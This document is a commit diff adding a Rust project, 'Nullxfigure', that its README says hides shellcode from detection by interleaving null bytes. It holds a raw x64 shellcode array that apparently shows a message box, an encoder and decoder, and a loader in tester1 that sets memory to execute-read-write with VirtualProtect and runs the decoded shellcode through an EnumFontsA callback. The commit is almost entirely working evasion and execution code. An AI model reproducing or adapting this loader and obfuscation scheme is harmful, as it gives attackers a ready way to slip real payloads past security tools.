NullxFigure

Whitecat18 · Whitecat18 · commit 77f324bd0140 · 2024-11-19T21:22:11.000+05:30
Sample Experiment to parse null bytes into each shellcode areas using hashmap to avoid shellcode detection.
diff --git a/Encryption Methods/nullxfigure/README.md b/Encryption Methods/nullxfigure/README.md
@@ -0,0 +1,8 @@
+
+## Nullxfigure 
+
+Simple Program to parse null bytes into each shellcode using hashmap to avoid shellcode detection.
+
+Still in development but it can be improved a lot !
+
+Author [@5mukx](https://x.com/5mukx)
diff --git a/Encryption Methods/nullxfigure/tester/Cargo.toml b/Encryption Methods/nullxfigure/tester/Cargo.toml
@@ -0,0 +1,9 @@
+[package]
+name = "tester"
+version = "0.1.0"
+edition = "2021"
+
+[dependencies]
+winapi = { version = "0.3.9", features = ["winuser","setupapi","dbghelp","wlanapi","winnls","wincon","fileapi","sysinfoapi", "fibersapi","debugapi","winerror", "wininet" , "winhttp" ,"synchapi","securitybaseapi","wincrypt","psapi", "tlhelp32", "heapapi","shellapi", "memoryapi", "processthreadsapi", "errhandlingapi", "winbase", "handleapi", "synchapi"] }
+ntapi = "0.4.1"
+# user32-sys = "0.2.0"
diff --git a/Encryption Methods/nullxfigure/tester/src/decrypt.rs b/Encryption Methods/nullxfigure/tester/src/decrypt.rs
@@ -0,0 +1,14 @@
+use std::collections::HashMap;
+
+pub fn decrypt_shellcode(encrypted_shellcode: &[u8]) -> Vec<u8> {
+    encrypted_shellcode
+        .iter()
+        .enumerate()
+        .filter(|(i, _)| i % 2 == 0) // Take every second byte (original bytes)
+        .map(|(_, &byte)| byte)
+        .collect()
+}
+
+pub fn get_original_shellcode(map: &HashMap<String, Vec<u8>>, key: &str) -> Option<Vec<u8>> {
+    map.get(key).cloned()
+}
diff --git a/Encryption Methods/nullxfigure/tester/src/encrypt.rs b/Encryption Methods/nullxfigure/tester/src/encrypt.rs
@@ -0,0 +1,18 @@
+use std::collections::HashMap;
+
+pub fn encrypt_shellcode(shellcode: &[u8], false_byte: u8) -> Vec<u8>{
+    let mut encrypted_shellcode=  Vec::with_capacity(shellcode.len() * 2);
+
+    for &byte in shellcode{
+        encrypted_shellcode.push(byte);
+        encrypted_shellcode.push(false_byte);
+    }
+
+    encrypted_shellcode
+}
+
+
+pub fn store_shellcode(map: &mut HashMap<String, Vec<u8>>, key: &str, shellcode: &[u8]){
+    map.insert(key.to_string(), shellcode.to_vec());
+}
+
diff --git a/Encryption Methods/nullxfigure/tester/src/main.rs b/Encryption Methods/nullxfigure/tester/src/main.rs
@@ -0,0 +1,85 @@
+mod encrypt;
+mod decrypt;
+
+use std::collections::HashMap;
+
+fn main() {
+    // Example shellcode
+    let shellcode = [
+        0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,
+        0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
+        0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,
+        0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,
+        0x3e,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,
+        0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
+        0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,
+        0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,
+        0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,
+        0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,
+        0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,
+        0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
+        0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,
+        0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,
+        0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,
+        0x1c,0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,
+        0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,
+        0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,
+        0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x3e,
+        0x48,0x8d,0x8d,0x30,0x01,0x00,0x00,0x41,0xba,0x4c,0x77,0x26,
+        0x07,0xff,0xd5,0x49,0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,
+        0x8d,0x95,0x0e,0x01,0x00,0x00,0x3e,0x4c,0x8d,0x85,0x24,0x01,
+        0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
+        0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,
+        0x48,0x65,0x79,0x20,0x6d,0x61,0x6e,0x2e,0x20,0x49,0x74,0x73,
+        0x20,0x6d,0x65,0x20,0x53,0x6d,0x75,0x6b,0x78,0x00,0x6b,0x6e,
+        0x6f,0x63,0x6b,0x2d,0x6b,0x6e,0x6f,0x63,0x6b,0x00,0x75,0x73,
+        0x65,0x72,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x00
+    ];
+
+
+    let false_byte = 0x00;
+    let mut shellcode_map = HashMap::new();
+
+    let encrypted_shellcode = encrypt::encrypt_shellcode(&shellcode, false_byte);
+    // println!("Encrypted Shellcode: {:x?}", encrypted_shellcode);
+    
+    println!("Encrypted Shellcode: [");
+    let mut x = 1;
+    for byte in encrypted_shellcode.iter(){
+        print!("0x{:x?}, ", byte);
+        if x % 8 == 0{
+            println!();
+            x = 0;
+        }
+        x += 1;
+    }
+
+    println!("]");
+
+    println!("\n\n");
+    encrypt::store_shellcode(&mut shellcode_map, "example", &shellcode);
+
+    let decrypted_shellcode = decrypt::decrypt_shellcode(&encrypted_shellcode);
+    // println!("Decrypted Shellcode: {:x?}", decrypted_shellcode);
+    
+    
+    println!("Decrypted Shellcode: [");
+    let mut x = 1;
+    for byte in decrypted_shellcode.iter(){
+        print!("0x{:x?}, ", byte);
+        if x % 8 == 0{
+            println!();
+            x = 0;
+        }
+        x += 1;
+    }
+    
+    println!("]");
+    println!("\n\n");
+
+    if let Some(original_shellcode) = decrypt::get_original_shellcode(&shellcode_map, "example") {
+        println!("Original Shellcode: {:x?}", original_shellcode);
+    } else {
+        eprintln!("Original shellcode not found in map.");
+    }
+}
diff --git a/Encryption Methods/nullxfigure/tester1/Cargo.toml b/Encryption Methods/nullxfigure/tester1/Cargo.toml
@@ -0,0 +1,8 @@
+[package]
+name = "tester1"
+version = "0.1.0"
+edition = "2021"
+
+[dependencies]
+winapi = { version = "0.3.9", features = ["winuser","setupapi","dbghelp","wlanapi","winnls","wincon","fileapi","sysinfoapi", "fibersapi","debugapi","winerror", "wininet" , "winhttp" ,"synchapi","securitybaseapi","wincrypt","psapi", "tlhelp32", "heapapi","shellapi", "memoryapi", "processthreadsapi", "errhandlingapi", "winbase", "handleapi", "synchapi"] }
+ntapi = "0.4.1"
diff --git a/Encryption Methods/nullxfigure/tester1/src/decrypt.rs b/Encryption Methods/nullxfigure/tester1/src/decrypt.rs
@@ -0,0 +1,53 @@
+use std::ptr::null_mut;
+
+use winapi::{ctypes::c_void, um::{errhandlingapi::GetLastError, memoryapi::VirtualProtect, wingdi::EnumFontsA, winuser::GetDC}};
+
+
+
+pub fn decrypt_shellcode(encrypted_shellcode: &[u8]) -> Vec<u8> {
+    encrypted_shellcode
+        .iter()
+        .enumerate()
+        .filter(|(i, _)| i % 2 == 0) // Keep every other byte (original bytes)
+        .map(|(_, &byte)| byte)
+        .collect()
+}
+
+pub fn sample_execute_shellcode(shellcode: &mut [u8]){
+        unsafe {
+            let mut old_protect = 0;
+    
+            // Change memory protection to PAGE_EXECUTE_READWRITE
+            let protect = VirtualProtect(
+                shellcode.as_mut_ptr() as *mut c_void,
+                shellcode.len(),
+                0x40, 
+                &mut old_protect,
+            );
+    
+            if protect == 0 {
+                eprintln!(
+                    "[-] Failed to change memory protection: {}",
+                    GetLastError()
+                );
+                return;
+            }
+    
+            println!("[+] Memory protection changed, executing shellcode...");
+    
+            // Execute shellcode via EnumFontsA
+            let result = EnumFontsA(
+                GetDC(null_mut()),             // Get the device context
+                std::ptr::null(),                        // Font name (null to enumerate all)
+                Some(std::mem::transmute(shellcode.as_ptr())), // Shellcode as callback
+                0,                             // lParam
+            );
+    
+            if result == 0 {
+                eprintln!("[-] EnumFontsA failed to execute the shellcode.");
+            } else {
+                println!("[+] Shellcode executed successfully.");
+            }
+        }
+    
+}
diff --git a/Encryption Methods/nullxfigure/tester1/src/main.rs b/Encryption Methods/nullxfigure/tester1/src/main.rs
@@ -0,0 +1,93 @@
+pub mod decrypt;
+
+fn main() {
+    let shellcode: [u8; 656] = [
+        0xfc, 0x0, 0x48, 0x0, 0x81, 0x0, 0xe4, 0x0, 
+        0xf0, 0x0, 0xff, 0x0, 0xff, 0x0, 0xff, 0x0, 
+        0xe8, 0x0, 0xd0, 0x0, 0x0, 0x0, 0x0, 0x0, 
+        0x0, 0x0, 0x41, 0x0, 0x51, 0x0, 0x41, 0x0, 
+        0x50, 0x0, 0x52, 0x0, 0x51, 0x0, 0x56, 0x0, 
+        0x48, 0x0, 0x31, 0x0, 0xd2, 0x0, 0x65, 0x0, 
+        0x48, 0x0, 0x8b, 0x0, 0x52, 0x0, 0x60, 0x0, 
+        0x3e, 0x0, 0x48, 0x0, 0x8b, 0x0, 0x52, 0x0, 
+        0x18, 0x0, 0x3e, 0x0, 0x48, 0x0, 0x8b, 0x0, 
+        0x52, 0x0, 0x20, 0x0, 0x3e, 0x0, 0x48, 0x0, 
+        0x8b, 0x0, 0x72, 0x0, 0x50, 0x0, 0x3e, 0x0,
+        0x48, 0x0, 0xf, 0x0, 0xb7, 0x0, 0x4a, 0x0,
+        0x4a, 0x0, 0x4d, 0x0, 0x31, 0x0, 0xc9, 0x0,
+        0x48, 0x0, 0x31, 0x0, 0xc0, 0x0, 0xac, 0x0,
+        0x3c, 0x0, 0x61, 0x0, 0x7c, 0x0, 0x2, 0x0,
+        0x2c, 0x0, 0x20, 0x0, 0x41, 0x0, 0xc1, 0x0,
+        0xc9, 0x0, 0xd, 0x0, 0x41, 0x0, 0x1, 0x0,
+        0xc1, 0x0, 0xe2, 0x0, 0xed, 0x0, 0x52, 0x0,
+        0x41, 0x0, 0x51, 0x0, 0x3e, 0x0, 0x48, 0x0,
+        0x8b, 0x0, 0x52, 0x0, 0x20, 0x0, 0x3e, 0x0,
+        0x8b, 0x0, 0x42, 0x0, 0x3c, 0x0, 0x48, 0x0,
+        0x1, 0x0, 0xd0, 0x0, 0x3e, 0x0, 0x8b, 0x0,
+        0x80, 0x0, 0x88, 0x0, 0x0, 0x0, 0x0, 0x0,
+        0x0, 0x0, 0x48, 0x0, 0x85, 0x0, 0xc0, 0x0,
+        0x74, 0x0, 0x6f, 0x0, 0x48, 0x0, 0x1, 0x0,
+        0xd0, 0x0, 0x50, 0x0, 0x3e, 0x0, 0x8b, 0x0,
+        0x48, 0x0, 0x18, 0x0, 0x3e, 0x0, 0x44, 0x0,
+        0x8b, 0x0, 0x40, 0x0, 0x20, 0x0, 0x49, 0x0,
+        0x1, 0x0, 0xd0, 0x0, 0xe3, 0x0, 0x5c, 0x0,
+        0x48, 0x0, 0xff, 0x0, 0xc9, 0x0, 0x3e, 0x0,
+        0x41, 0x0, 0x8b, 0x0, 0x34, 0x0, 0x88, 0x0,
+        0x48, 0x0, 0x1, 0x0, 0xd6, 0x0, 0x4d, 0x0,
+        0x31, 0x0, 0xc9, 0x0, 0x48, 0x0, 0x31, 0x0,
+        0xc0, 0x0, 0xac, 0x0, 0x41, 0x0, 0xc1, 0x0,
+        0xc9, 0x0, 0xd, 0x0, 0x41, 0x0, 0x1, 0x0,
+        0xc1, 0x0, 0x38, 0x0, 0xe0, 0x0, 0x75, 0x0,
+        0xf1, 0x0, 0x3e, 0x0, 0x4c, 0x0, 0x3, 0x0,
+        0x4c, 0x0, 0x24, 0x0, 0x8, 0x0, 0x45, 0x0,
+        0x39, 0x0, 0xd1, 0x0, 0x75, 0x0, 0xd6, 0x0,
+        0x58, 0x0, 0x3e, 0x0, 0x44, 0x0, 0x8b, 0x0,
+        0x40, 0x0, 0x24, 0x0, 0x49, 0x0, 0x1, 0x0,
+        0xd0, 0x0, 0x66, 0x0, 0x3e, 0x0, 0x41, 0x0,
+        0x8b, 0x0, 0xc, 0x0, 0x48, 0x0, 0x3e, 0x0,
+        0x44, 0x0, 0x8b, 0x0, 0x40, 0x0, 0x1c, 0x0,
+        0x49, 0x0, 0x1, 0x0, 0xd0, 0x0, 0x3e, 0x0,
+        0x41, 0x0, 0x8b, 0x0, 0x4, 0x0, 0x88, 0x0,
+        0x48, 0x0, 0x1, 0x0, 0xd0, 0x0, 0x41, 0x0,
+        0x58, 0x0, 0x41, 0x0, 0x58, 0x0, 0x5e, 0x0,
+        0x59, 0x0, 0x5a, 0x0, 0x41, 0x0, 0x58, 0x0,
+        0x41, 0x0, 0x59, 0x0, 0x41, 0x0, 0x5a, 0x0,
+        0x48, 0x0, 0x83, 0x0, 0xec, 0x0, 0x20, 0x0,
+        0x41, 0x0, 0x52, 0x0, 0xff, 0x0, 0xe0, 0x0,
+        0x58, 0x0, 0x41, 0x0, 0x59, 0x0, 0x5a, 0x0,
+        0x3e, 0x0, 0x48, 0x0, 0x8b, 0x0, 0x12, 0x0,
+        0xe9, 0x0, 0x49, 0x0, 0xff, 0x0, 0xff, 0x0,
+        0xff, 0x0, 0x5d, 0x0, 0x3e, 0x0, 0x48, 0x0,
+        0x8d, 0x0, 0x8d, 0x0, 0x30, 0x0, 0x1, 0x0,
+        0x0, 0x0, 0x0, 0x0, 0x41, 0x0, 0xba, 0x0,
+        0x4c, 0x0, 0x77, 0x0, 0x26, 0x0, 0x7, 0x0,
+        0xff, 0x0, 0xd5, 0x0, 0x49, 0x0, 0xc7, 0x0,
+        0xc1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
+        0x0, 0x0, 0x3e, 0x0, 0x48, 0x0, 0x8d, 0x0,
+        0x95, 0x0, 0xe, 0x0, 0x1, 0x0, 0x0, 0x0,
+        0x0, 0x0, 0x3e, 0x0, 0x4c, 0x0, 0x8d, 0x0,
+        0x85, 0x0, 0x24, 0x0, 0x1, 0x0, 0x0, 0x0,
+        0x0, 0x0, 0x48, 0x0, 0x31, 0x0, 0xc9, 0x0,
+        0x41, 0x0, 0xba, 0x0, 0x45, 0x0, 0x83, 0x0,
+        0x56, 0x0, 0x7, 0x0, 0xff, 0x0, 0xd5, 0x0,
+        0x48, 0x0, 0x31, 0x0, 0xc9, 0x0, 0x41, 0x0,
+        0xba, 0x0, 0xf0, 0x0, 0xb5, 0x0, 0xa2, 0x0,
+        0x56, 0x0, 0xff, 0x0, 0xd5, 0x0, 0x48, 0x0,
+        0x65, 0x0, 0x79, 0x0, 0x20, 0x0, 0x6d, 0x0,
+        0x61, 0x0, 0x6e, 0x0, 0x2e, 0x0, 0x20, 0x0,
+        0x49, 0x0, 0x74, 0x0, 0x73, 0x0, 0x20, 0x0,
+        0x6d, 0x0, 0x65, 0x0, 0x20, 0x0, 0x53, 0x0,
+        0x6d, 0x0, 0x75, 0x0, 0x6b, 0x0, 0x78, 0x0,
+        0x0, 0x0, 0x6b, 0x0, 0x6e, 0x0, 0x6f, 0x0,
+        0x63, 0x0, 0x6b, 0x0, 0x2d, 0x0, 0x6b, 0x0,
+        0x6e, 0x0, 0x6f, 0x0, 0x63, 0x0, 0x6b, 0x0,
+        0x0, 0x0, 0x75, 0x0, 0x73, 0x0, 0x65, 0x0,
+        0x72, 0x0, 0x33, 0x0, 0x32, 0x0, 0x2e, 0x0,
+        0x64, 0x0, 0x6c, 0x0, 0x6c, 0x0, 0x0, 0x0,
+    ];
+
+    let mut decrypt_shellcode = decrypt::decrypt_shellcode(&shellcode);
+    println!("Decrypted Shellcode: {:?}", decrypt_shellcode);
+
+    decrypt::sample_execute_shellcode(&mut decrypt_shellcode);
+}
